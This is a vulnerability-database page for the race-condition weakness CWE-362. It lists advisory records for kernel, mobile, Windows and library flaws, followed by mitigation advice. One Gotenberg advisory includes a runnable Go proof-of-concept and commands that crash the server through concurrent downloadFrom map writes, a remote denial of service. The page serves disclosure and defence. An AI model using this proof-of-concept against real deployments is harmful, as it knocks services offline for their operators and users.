CWE-362
Allowed-with-ReviewConcurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Abstraction: Class · Status: Draft
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.
2900 vulnerabilities reference this CWE, most recent first.
GHSA-VJ9C-2CRJ-HP9G
Vulnerability from github – Published: 2023-06-19 00:30 – Updated: 2024-04-04 04:55An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in dm1105_remove in drivers/media/pci/dm1105/dm1105.c.
{
"affected": [],
"aliases": [
"CVE-2023-35824"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-18T22:15:09Z",
"severity": "HIGH"
},
"details": "An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in dm1105_remove in drivers/media/pci/dm1105/dm1105.c.",
"id": "GHSA-vj9c-2crj-hp9g",
"modified": "2024-04-04T04:55:46Z",
"published": "2023-06-19T00:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35824"
},
{
"type": "WEB",
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5abda7a16698d4d1f47af1168d8fa2c640116b4a"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"type": "WEB",
"url": "https://lore.kernel.org/all/49bb0b6a-e669-d4e7-d742-a19d2763e947%40xs4all.nl"
},
{
"type": "WEB",
"url": "https://lore.kernel.org/all/49bb0b6a-e669-d4e7-d742-a19d2763e947@xs4all.nl"
},
{
"type": "WEB",
"url": "https://lore.kernel.org/lkml/20230318081506.795147-1-zyytlz.wz%40163.com"
},
{
"type": "WEB",
"url": "https://lore.kernel.org/lkml/20230318081506.795147-1-zyytlz.wz@163.com"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230803-0002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VJVH-J8WP-QPWM
Vulnerability from github – Published: 2022-05-17 05:28 – Updated: 2022-05-17 05:28The tunnels implementation in the Linux kernel before 2.6.34, when tunnel functionality is configured as a module, allows remote attackers to cause a denial of service (OOPS) by sending a packet during module loading.
{
"affected": [],
"aliases": [
"CVE-2011-1768"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-06-13T10:24:00Z",
"severity": "MODERATE"
},
"details": "The tunnels implementation in the Linux kernel before 2.6.34, when tunnel functionality is configured as a module, allows remote attackers to cause a denial of service (OOPS) by sending a packet during module loading.",
"id": "GHSA-vjvh-j8wp-qpwm",
"modified": "2022-05-17T05:28:36Z",
"published": "2022-05-17T05:28:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2011-1768"
},
{
"type": "WEB",
"url": "https://github.com/torvalds/linux/commit/d5aa407f59f5b83d2c50ec88f5bf56d40f1f8978"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=702303"
},
{
"type": "WEB",
"url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/ChangeLog-2.6.34"
},
{
"type": "WEB",
"url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=d5aa407f59f5b83d2c50ec88f5bf56d40f1f8978"
},
{
"type": "WEB",
"url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=d5aa407f59f5b83d2c50ec88f5bf56d40f1f8978"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2011/05/05/6"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-VJWR-279M-HHV6
Vulnerability from github – Published: 2022-05-14 01:11 – Updated: 2022-05-14 01:11A race condition was addressed with additional validation. This issue affected versions prior to iOS 11.2, macOS High Sierra 10.13.2, tvOS 11.2, watchOS 4.2, iTunes 12.7.2 for Windows, macOS High Sierra 10.13.4.
{
"affected": [],
"aliases": [
"CVE-2017-7151"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-04-03T18:29:00Z",
"severity": "HIGH"
},
"details": "A race condition was addressed with additional validation. This issue affected versions prior to iOS 11.2, macOS High Sierra 10.13.2, tvOS 11.2, watchOS 4.2, iTunes 12.7.2 for Windows, macOS High Sierra 10.13.4.",
"id": "GHSA-vjwr-279m-hhv6",
"modified": "2022-05-14T01:11:51Z",
"published": "2022-05-14T01:11:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7151"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT208325"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT208326"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT208327"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT208331"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT208334"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT208692"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VM2C-C97C-2RV9
Vulnerability from github – Published: 2025-09-04 21:31 – Updated: 2025-09-04 21:31In multiple functions of AppOpsControllerImpl.java, there is a possible way to record audio without displaying the privacy indicator due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2025-48548"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T19:15:41Z",
"severity": "HIGH"
},
"details": "In multiple functions of AppOpsControllerImpl.java, there is a possible way to record audio without displaying the privacy indicator due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.",
"id": "GHSA-vm2c-c97c-2rv9",
"modified": "2025-09-04T21:31:38Z",
"published": "2025-09-04T21:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48548"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/av/+/37e7f808fad105da187b021fb762a66d37c9212a"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/av/+/8c09eb1034cb3b02a66f6c241c0b9c9981998d6f"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/00344da68fce6ec4f7a1bf36f0ea3797805f00ce"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/20e363e2225843ff3cc7d6bea05ae2f4db83b408"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/acbd37d21c2feffb6d64e669b956d59a6062b751"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2025-09-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VM86-RQFJ-QP62
Vulnerability from github – Published: 2022-05-17 01:58 – Updated: 2022-05-17 01:58In all Qualcomm products with Android releases from CAF using the Linux kernel, a race condition exists in a video driver which can lead to a double free.
{
"affected": [],
"aliases": [
"CVE-2017-8265"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-18T18:29:00Z",
"severity": "HIGH"
},
"details": "In all Qualcomm products with Android releases from CAF using the Linux kernel, a race condition exists in a video driver which can lead to a double free.",
"id": "GHSA-vm86-rqfj-qp62",
"modified": "2022-05-17T01:58:39Z",
"published": "2022-05-17T01:58:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8265"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2017-07-01"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/99465"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VMJX-8XFM-7MJW
Vulnerability from github – Published: 2022-05-04 00:30 – Updated: 2022-05-04 00:30Race condition in sap_suse_cluster_connector before 1.0.0-0.8.1 in SUSE Linux Enterprise for SAP Applications 11 SP2 allows local users to have an unspecified impact via vectors related to a tmp/ directory.
{
"affected": [],
"aliases": [
"CVE-2012-0426"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-12-02T04:36:00Z",
"severity": "HIGH"
},
"details": "Race condition in sap_suse_cluster_connector before 1.0.0-0.8.1 in SUSE Linux Enterprise for SAP Applications 11 SP2 allows local users to have an unspecified impact via vectors related to a tmp/ directory.",
"id": "GHSA-vmjx-8xfm-7mjw",
"modified": "2022-05-04T00:30:09Z",
"published": "2022-05-04T00:30:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0426"
},
{
"type": "WEB",
"url": "https://bugzilla.novell.com/show_bug.cgi?id=763793"
},
{
"type": "WEB",
"url": "https://bugzilla.novell.com/show_bug.cgi?id=777453"
},
{
"type": "WEB",
"url": "https://bugzilla.novell.com/show_bug.cgi?id=778273"
},
{
"type": "WEB",
"url": "https://bugzilla.novell.com/show_bug.cgi?id=778293"
},
{
"type": "WEB",
"url": "https://support.novell.com/security/cve/CVE-2012-0426.html"
},
{
"type": "WEB",
"url": "http://download.novell.com/Download?buildid=DshQViDsMLE~"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-VMR3-QPPH-96GQ
Vulnerability from github – Published: 2022-05-13 01:15 – Updated: 2022-05-13 01:15Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016.
{
"affected": [],
"aliases": [
"CVE-2013-1270"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-02-13T12:04:00Z",
"severity": "MODERATE"
},
"details": "Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016.",
"id": "GHSA-vmr3-qpph-96gq",
"modified": "2022-05-13T01:15:46Z",
"published": "2022-05-13T01:15:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1270"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-016"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16349"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA13-043B.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-VMX6-H5GH-R675
Vulnerability from github – Published: 2025-09-05 18:31 – Updated: 2026-07-14 15:31In the Linux kernel, the following vulnerability has been resolved:
mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd()
Memory hot remove unmaps and tears down various kernel page table regions as required. The ptdump code can race with concurrent modifications of the kernel page tables. When leaf entries are modified concurrently, the dump code may log stale or inconsistent information for a VA range, but this is otherwise not harmful.
But when intermediate levels of kernel page table are freed, the dump code will continue to use memory that has been freed and potentially reallocated for another purpose. In such cases, the ptdump code may dereference bogus addresses, leading to a number of potential problems.
To avoid the above mentioned race condition, platforms such as arm64, riscv and s390 take memory hotplug lock, while dumping kernel page table via the sysfs interface /sys/kernel/debug/kernel_page_tables.
Similar race condition exists while checking for pages that might have been marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages which in turn calls ptdump_check_wx(). Instead of solving this race condition again, let's just move the memory hotplug lock inside generic ptdump_check_wx() which will benefit both the scenarios.
Drop get_online_mems() and put_online_mems() combination from all existing platform ptdump code paths.
{
"affected": [],
"aliases": [
"CVE-2025-38681"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T16:15:35Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd()\n\nMemory hot remove unmaps and tears down various kernel page table regions\nas required. The ptdump code can race with concurrent modifications of\nthe kernel page tables. When leaf entries are modified concurrently, the\ndump code may log stale or inconsistent information for a VA range, but\nthis is otherwise not harmful.\n\nBut when intermediate levels of kernel page table are freed, the dump code\nwill continue to use memory that has been freed and potentially\nreallocated for another purpose. In such cases, the ptdump code may\ndereference bogus addresses, leading to a number of potential problems.\n\nTo avoid the above mentioned race condition, platforms such as arm64,\nriscv and s390 take memory hotplug lock, while dumping kernel page table\nvia the sysfs interface /sys/kernel/debug/kernel_page_tables.\n\nSimilar race condition exists while checking for pages that might have\nbeen marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages\nwhich in turn calls ptdump_check_wx(). Instead of solving this race\ncondition again, let\u0027s just move the memory hotplug lock inside generic\nptdump_check_wx() which will benefit both the scenarios.\n\nDrop get_online_mems() and put_online_mems() combination from all existing\nplatform ptdump code paths.",
"id": "GHSA-vmx6-h5gh-r675",
"modified": "2026-07-14T15:31:27Z",
"published": "2025-09-05T18:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38681"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/1636b5e9c3543b87d673e32a47e7c18698882425"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/3ee9a8c27bfd72c3f465004fa8455785d61be5e8"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/59305202c67fea50378dcad0cc199dbc13a0e99a"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/67995d4244694928ce701928e530b5b4adeb17b4"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/69bea84b06b5e779627e7afdbf4b60a7d231c76f"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ac25ec5fa2bf6e606dc7954488e4dded272fa9cd"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ca8c414499f2e5337a95a76be0d21b728ee31c6b"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ff40839e018b82c4d756d035f34a63aa2d93be83"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-VP6R-MRQ9-8F4H
Vulnerability from github – Published: 2021-08-25 20:58 – Updated: 2023-06-13 21:50Affected versions of this crate unconditionally implements Send for Bucket2. This allows sending non-Send types to other threads. This can lead to data races when non Send types like Cell or Rc are contained inside Bucket2 and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). The flaw was corrected in commit 15b2828 by adding a T: Send bound to the Send impl of Bucket2.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "syncpool"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-36462"
],
"database_specific": {
"cwe_ids": [
"CWE-362",
"CWE-77"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-18T20:18:30Z",
"nvd_published_at": "2021-08-08T06:15:00Z",
"severity": "HIGH"
},
"details": "Affected versions of this crate unconditionally implements Send for Bucket2. This allows sending non-Send types to other threads. This can lead to data races when non Send types like Cell\u003cT\u003e or Rc\u003cT\u003e are contained inside Bucket2 and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). The flaw was corrected in commit `15b2828` by adding a T: Send bound to the Send impl of Bucket2\u003cT\u003e.",
"id": "GHSA-vp6r-mrq9-8f4h",
"modified": "2023-06-13T21:50:03Z",
"published": "2021-08-25T20:58:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36462"
},
{
"type": "WEB",
"url": "https://github.com/Chopinsky/byte_buffer/issues/2"
},
{
"type": "WEB",
"url": "https://github.com/Chopinsky/byte_buffer/commit/15b282877d1e576de2b337d8162bbf43ed1a0f2d"
},
{
"type": "PACKAGE",
"url": "https://github.com/Chopinsky/byte_buffer/tree/master/syncpool"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/syncpool/RUSTSEC-2020-0142.md"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2020-0142.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Data race in syncpool"
}
GHSA-VP73-VJW8-8F32
Vulnerability from github – Published: 2026-05-29 16:56 – Updated: 2026-05-29 16:56Summary
Gotenberg is vulnerable to a remote denial of service in multipart downloadFrom handling.
A multipart request containing multiple downloadFrom entries causes concurrent goroutines to write to shared maps without synchronization. This can terminate the process with fatal error: concurrent map writes.
In the default configuration, downloadFrom is enabled and authentication is disabled, so an exposed instance can be crashed by an unauthenticated remote attacker.
Details
The issue is in pkg/modules/api/context.go.
newContext parses multipart requests and processes the downloadFrom form field before the route handler runs. For each downloadFrom entry, it starts a goroutine via errgroup.Go():
pkg/modules/api/context.go:221
Each goroutine downloads a file and then writes to request context maps shared by all goroutines:
ctx.files[filename] = pathctx.diskToOriginal[path] = filenamectx.filesByField[...] = append(...)
Affected lines in current main:
pkg/modules/api/context.go:395pkg/modules/api/context.go:396pkg/modules/api/context.go:401
Go maps and slices are not safe for concurrent writes. A crafted multipart request with many downloadFrom entries can therefore trigger a runtime crash.
The vulnerable downloadFrom feature was introduced in commit f2b6bd3d. The first tagged release containing this code appears to be v8.10.0.
PoC
The following self-contained command creates a temporary test file, runs the PoC, and removes the file afterwards. It does not require any external network access.
Run from the repository root:
cat > pkg/modules/api/downloadfrom_race_poc_test.go <<'EOF'
//go:build security_poc
package api
import (
"bytes"
"encoding/json"
"fmt"
"log/slog"
"mime/multipart"
"net/http"
"net/http/httptest"
"sync"
"testing"
"time"
"github.com/labstack/echo/v4"
"github.com/gotenberg/gotenberg/v8/pkg/gotenberg"
)
func TestSecurityPoCDownloadFromConcurrentMapWrites(t *testing.T) {
const downloads = 64
var ready sync.WaitGroup
ready.Add(downloads)
release := make(chan struct{})
var releaseOnce sync.Once
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
ready.Done()
go func() {
ready.Wait()
releaseOnce.Do(func() {
close(release)
})
}()
<-release
filename := fmt.Sprintf("download-%s.txt", r.URL.Query().Get("i"))
w.Header().Set("Content-Disposition", fmt.Sprintf(`attachment; filename="%s"`, filename))
_, _ = w.Write([]byte("downloaded"))
}))
defer server.Close()
dls := make([]downloadFrom, downloads)
for i := range dls {
dls[i] = downloadFrom{
Url: fmt.Sprintf("%s/file?i=%d", server.URL, i),
Field: "embedded",
}
}
payload, err := json.Marshal(dls)
if err != nil {
t.Fatalf("marshal downloadFrom payload: %v", err)
}
body := new(bytes.Buffer)
writer := multipart.NewWriter(body)
err = writer.WriteField("downloadFrom", string(payload))
if err != nil {
t.Fatalf("write downloadFrom field: %v", err)
}
err = writer.Close()
if err != nil {
t.Fatalf("close multipart writer: %v", err)
}
req := httptest.NewRequest(http.MethodPost, "/forms/libreoffice/convert", body)
req.Header.Set("Content-Type", writer.FormDataContentType())
echoCtx := echo.New().NewContext(req, httptest.NewRecorder())
logger := slog.New(slog.DiscardHandler)
fs := gotenberg.NewFileSystem(new(gotenberg.OsMkdirAll))
downloadFromCfg := downloadFromConfig{
maxRetry: 0,
}
ctx, cancel, err := newContext(echoCtx, logger, fs, 10*time.Second, 0, downloadFromCfg)
if err != nil {
t.Fatalf("newContext returned error: %v", err)
}
defer cancel()
if got := len(ctx.files); got != downloads {
t.Fatalf("downloaded files = %d, want %d", got, downloads)
}
}
EOF
GOTOOLCHAIN=go1.26.2 go test -race -tags security_poc ./pkg/modules/api -run TestSecurityPoCDownloadFromConcurrentMapWrites -count=1
rm pkg/modules/api/downloadfrom_race_poc_test.go
Expected result with the race detector:
WARNING: DATA RACE
Write at ...
github.com/gotenberg/gotenberg/v8/pkg/modules/api.newContext.func3()
.../pkg/modules/api/context.go:395
WARNING: DATA RACE
.../pkg/modules/api/context.go:396
WARNING: DATA RACE
.../pkg/modules/api/context.go:401
Running the same PoC without -race also demonstrates practical process termination:
GOTOOLCHAIN=go1.26.2 go test -tags security_poc ./pkg/modules/api -run TestSecurityPoCDownloadFromConcurrentMapWrites -count=20
Observed result:
fatal error: concurrent map writes
github.com/gotenberg/gotenberg/v8/pkg/modules/api.newContext.func3()
.../pkg/modules/api/context.go:395
FAIL github.com/gotenberg/gotenberg/v8/pkg/modules/api
Impact
This is a remote denial-of-service vulnerability.
Any deployment that exposes multipart conversion endpoints with downloadFrom enabled is affected. In the default configuration, downloadFrom is enabled and basic authentication is disabled, so internet-exposed default deployments may be vulnerable to unauthenticated process termination.
The vulnerability affects availability only. I did not find evidence of confidentiality or integrity impact.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.32.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/gotenberg/gotenberg/v8"
},
"ranges": [
{
"events": [
{
"introduced": "8.10.0"
},
{
"fixed": "8.33.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45742"
],
"database_specific": {
"cwe_ids": [
"CWE-362"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T16:56:18Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nGotenberg is vulnerable to a remote denial of service in multipart `downloadFrom` handling.\n\nA multipart request containing multiple `downloadFrom` entries causes concurrent goroutines to write to shared maps without synchronization. This can terminate the process with `fatal error: concurrent map writes`.\n\nIn the default configuration, `downloadFrom` is enabled and authentication is disabled, so an exposed instance can be crashed by an unauthenticated remote attacker.\n\n### Details\n\nThe issue is in `pkg/modules/api/context.go`.\n\n`newContext` parses multipart requests and processes the `downloadFrom` form field before the route handler runs. For each `downloadFrom` entry, it starts a goroutine via `errgroup.Go()`:\n\n- `pkg/modules/api/context.go:221`\n\nEach goroutine downloads a file and then writes to request context maps shared by all goroutines:\n\n- `ctx.files[filename] = path`\n- `ctx.diskToOriginal[path] = filename`\n- `ctx.filesByField[...] = append(...)`\n\nAffected lines in current `main`:\n\n- `pkg/modules/api/context.go:395`\n- `pkg/modules/api/context.go:396`\n- `pkg/modules/api/context.go:401`\n\nGo maps and slices are not safe for concurrent writes. A crafted multipart request with many `downloadFrom` entries can therefore trigger a runtime crash.\n\nThe vulnerable `downloadFrom` feature was introduced in commit `f2b6bd3d`. The first tagged release containing this code appears to be `v8.10.0`.\n\n### PoC\n\nThe following self-contained command creates a temporary test file, runs the PoC, and removes the file afterwards. It does not require any external network access.\n\nRun from the repository root:\n\n cat \u003e pkg/modules/api/downloadfrom_race_poc_test.go \u003c\u003c\u0027EOF\u0027\n //go:build security_poc\n\n package api\n\n import (\n \"bytes\"\n \"encoding/json\"\n \"fmt\"\n \"log/slog\"\n \"mime/multipart\"\n \"net/http\"\n \"net/http/httptest\"\n \"sync\"\n \"testing\"\n \"time\"\n\n \"github.com/labstack/echo/v4\"\n\n \"github.com/gotenberg/gotenberg/v8/pkg/gotenberg\"\n )\n\n func TestSecurityPoCDownloadFromConcurrentMapWrites(t *testing.T) {\n const downloads = 64\n\n var ready sync.WaitGroup\n ready.Add(downloads)\n release := make(chan struct{})\n var releaseOnce sync.Once\n\n server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n ready.Done()\n go func() {\n ready.Wait()\n releaseOnce.Do(func() {\n close(release)\n })\n }()\n \u003c-release\n\n filename := fmt.Sprintf(\"download-%s.txt\", r.URL.Query().Get(\"i\"))\n w.Header().Set(\"Content-Disposition\", fmt.Sprintf(`attachment; filename=\"%s\"`, filename))\n _, _ = w.Write([]byte(\"downloaded\"))\n }))\n defer server.Close()\n\n dls := make([]downloadFrom, downloads)\n for i := range dls {\n dls[i] = downloadFrom{\n Url: fmt.Sprintf(\"%s/file?i=%d\", server.URL, i),\n Field: \"embedded\",\n }\n }\n\n payload, err := json.Marshal(dls)\n if err != nil {\n t.Fatalf(\"marshal downloadFrom payload: %v\", err)\n }\n\n body := new(bytes.Buffer)\n writer := multipart.NewWriter(body)\n err = writer.WriteField(\"downloadFrom\", string(payload))\n if err != nil {\n t.Fatalf(\"write downloadFrom field: %v\", err)\n }\n err = writer.Close()\n if err != nil {\n t.Fatalf(\"close multipart writer: %v\", err)\n }\n\n req := httptest.NewRequest(http.MethodPost, \"/forms/libreoffice/convert\", body)\n req.Header.Set(\"Content-Type\", writer.FormDataContentType())\n\n echoCtx := echo.New().NewContext(req, httptest.NewRecorder())\n logger := slog.New(slog.DiscardHandler)\n fs := gotenberg.NewFileSystem(new(gotenberg.OsMkdirAll))\n downloadFromCfg := downloadFromConfig{\n maxRetry: 0,\n }\n\n ctx, cancel, err := newContext(echoCtx, logger, fs, 10*time.Second, 0, downloadFromCfg)\n if err != nil {\n t.Fatalf(\"newContext returned error: %v\", err)\n }\n defer cancel()\n\n if got := len(ctx.files); got != downloads {\n t.Fatalf(\"downloaded files = %d, want %d\", got, downloads)\n }\n }\n EOF\n\n GOTOOLCHAIN=go1.26.2 go test -race -tags security_poc ./pkg/modules/api -run TestSecurityPoCDownloadFromConcurrentMapWrites -count=1\n rm pkg/modules/api/downloadfrom_race_poc_test.go\n\nExpected result with the race detector:\n\n WARNING: DATA RACE\n Write at ...\n github.com/gotenberg/gotenberg/v8/pkg/modules/api.newContext.func3()\n .../pkg/modules/api/context.go:395\n\n WARNING: DATA RACE\n .../pkg/modules/api/context.go:396\n\n WARNING: DATA RACE\n .../pkg/modules/api/context.go:401\n\nRunning the same PoC without `-race` also demonstrates practical process termination:\n\n GOTOOLCHAIN=go1.26.2 go test -tags security_poc ./pkg/modules/api -run TestSecurityPoCDownloadFromConcurrentMapWrites -count=20\n\nObserved result:\n\n fatal error: concurrent map writes\n github.com/gotenberg/gotenberg/v8/pkg/modules/api.newContext.func3()\n .../pkg/modules/api/context.go:395\n FAIL github.com/gotenberg/gotenberg/v8/pkg/modules/api\n\n### Impact\n\nThis is a remote denial-of-service vulnerability.\n\nAny deployment that exposes multipart conversion endpoints with `downloadFrom` enabled is affected. In the default configuration, `downloadFrom` is enabled and basic authentication is disabled, so internet-exposed default deployments may be vulnerable to unauthenticated process termination.\n\nThe vulnerability affects availability only. I did not find evidence of confidentiality or integrity impact.",
"id": "GHSA-vp73-vjw8-8f32",
"modified": "2026-05-29T16:56:18Z",
"published": "2026-05-29T16:56:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-vp73-vjw8-8f32"
},
{
"type": "PACKAGE",
"url": "https://github.com/gotenberg/gotenberg"
},
{
"type": "WEB",
"url": "https://github.com/gotenberg/gotenberg/releases/tag/v8.33.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Gotenberg has a Race Condition via Multipart `downloadFrom` Handling"
}
Mitigation
In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance.
Mitigation
Use thread-safe capabilities such as the data access abstraction in Spring.
Mitigation
- Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.
- Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400).
Mitigation
When using multithreading and operating on shared variables, only use thread-safe functions.
Mitigation
Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write.
Mitigation
Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412.
Mitigation
